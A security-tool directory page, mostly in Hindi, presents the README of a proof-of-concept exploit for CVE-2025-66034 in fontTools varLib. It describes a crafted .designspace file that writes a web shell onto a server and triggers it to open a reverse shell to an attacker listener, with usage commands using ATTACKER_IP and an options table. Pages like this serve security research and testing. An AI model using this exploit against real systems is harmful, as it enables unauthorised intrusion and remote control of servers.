Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
varlib-cve-2025-66034 — Proof-of-concept exploit for CVE-2025-66034 in the fontTools variable font generation pipeline. A crafted .designspace file allows control of the output path, enabling arbitrary file writes. The script automates payload creation, font generation, and upload to demonstrate the issue. | Kitploit
उपकरण/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

Proof-of-concept exploit for CVE-2025-66034 in the fontTools variable font generation pipeline. A crafted .designspace file allows control of the output path, enabling arbitrary file writes. The script automates payload creation, font generation, and upload to demonstrate the issue.

25 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

fontTools varLib CVE-2025-66034 शोषण

cve component vulnerability vector impact language dependency license

यह रिपॉजिटरी कोई नई कमजोरी पेश नहीं करती है।

यह CVE-2025-66034 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण है जो fontTools varLib वेरिएबल फ़ॉन्ट जनरेशन पाइपलाइन को प्रभावित करता है।

यह कमजोरी हमलावरों को एक क्राफ्टेड .designspace फ़ाइल के अंदर आउटपुट फ़ाइल नाम को नियंत्रित करने की अनुमति देती है। जब एक कमजोर फ़ॉन्ट जनरेशन सेवा द्वारा संसाधित किया जाता है, तो यह सर्वर फ़ाइलसिस्टम पर मनमानी फ़ाइल लिखने का कारण बन सकता है।

स्क्रिप्ट varlib_cve_2025_66034.py पेलोड निर्माण, फ़ॉन्ट जनरेशन, अपलोड और वैकल्पिक शेल ट्रिगरिंग को स्वचालित करती है।


विशेषताएँ

  • fontTools का उपयोग करके संगत मास्टर फ़ॉन्ट का स्वचालित निर्माण
  • यादृच्छिक शेल फ़ाइलनाम जनरेशन
  • अनुकूलन योग्य लक्ष्य पथ और अपलोड एंडपॉइंट
  • स्वचालित nc लिसनर
  • किसी मैन्युअल फ़ॉन्ट तैयारी की आवश्यकता नहीं

आवश्यकताएँ

पायथन 3.9+

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install fonttools requests

लिसनर के लिए Netcat आवश्यक है:


उपयोग

यदि आपका लक्ष्य mysite.com पर चलने वाली एक सेल्फ-होस्टेड लैब है, और अपलोड पथ, फ़ाइलसिस्टम लेखन पथ, और वेब-एक्सेसिबल ट्रिगर पथ स्क्रिप्ट में डिफ़ॉल्ट से मेल खाते हैं, तो आप इसे सीधे चला सकते हैं।

मूल उपयोग:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

यह अत्यधिक संभावना है कि लक्ष्य अलग-अलग URL या फ़ाइलसिस्टम पथ का उपयोग करता है, नीचे उपलब्ध विकल्पों जैसे --url, --path, और --trigger के साथ डिफ़ॉल्ट को ओवरराइड करें या स्क्रिप्ट को मैन्युअल रूप से संशोधित करें

नोट: मल्टीपार्ट अपलोड फॉर्म नाम पर्यावरण के आधार पर भिन्न हो सकते हैं। यदि लक्ष्य स्क्रिप्ट के समान फॉर्म फ़ील्ड नामों का उपयोग नहीं करता है, तो शोषण चलाने से पहले उन्हें files अनुभाग में समायोजित करें।

विकल्प

कस्टम विकल्पों के साथ उदाहरण:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

शोषण कार्यप्रवाह

  1. संगत मास्टर फ़ॉन्ट उत्पन्न करें
  2. दुर्भावनापूर्ण .designspace फ़ाइल बनाएँ
  3. मल्टीपार्ट POST के माध्यम से पेलोड अपलोड करें
  4. सर्वर पर मनमानी फ़ाइल लिखें
  5. HTTP अनुरोध के माध्यम से पेलोड ट्रिगर करें

क्रेडिट / स्वीकृतियाँ

विशेष धन्यवाद और सम्मान:

  • ओपन-सोर्स fontTools लाइब्रेरी पर उनके काम के लिए fontTools प्रोजेक्ट के अनुरक्षकों और योगदानकर्ताओं को।
  • वे सुरक्षा शोधकर्ता जिन्होंने CVE-2025-66034 की खोज की और जिम्मेदारी से इसका खुलासा किया।
  • ओपन-सोर्स सुरक्षा समुदाय को कमजोरियों का दस्तावेजीकरण और विश्लेषण करने के लिए जो सॉफ़्टवेयर सुरक्षा में सुधार करने में मदद करता है।

यह प्रूफ-ऑफ-कॉन्सेप्ट शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है ताकि कमजोरी और इसके प्रभाव को समझने में मदद मिल सके।


अस्वीकरण

यह कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

इस शोषण का उपयोग उन प्रणालियों के खिलाफ न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।

लेखक इस सॉफ़्टवेयर के दुरुपयोग या इसके कारण होने वाली क्षति के लिए जिम्मेदार नहीं है।


संदर्भ

  • CVE विवरण: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • GitHub सलाह: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • fontTools प्रोजेक्ट: https://github.com/fonttools/fonttools
  • fontTools दस्तावेज़ीकरण: https://fonttools.readthedocs.io/
टूल डाउनलोड करें
आर्गुमेंटविवरण
--ipहमलावर लिसनर IP
--portलिसनर पोर्ट
--pathलक्ष्य फ़ाइलसिस्टम पथ जहाँ फ़ाइल लिखी जाएगी (वेब शेल को ट्रिगर करने के लिए वेब-एक्सेसिबल होना चाहिए)
--urlअपलोड एंडपॉइंट, फॉर्म भिन्न हो सकता है
--triggerअपलोड के बाद लिखित पेलोड को ट्रिगर करने के लिए उपयोग किया जाने वाला बेस URL
--no-listenस्वचालित netcat लिसनर को अक्षम करें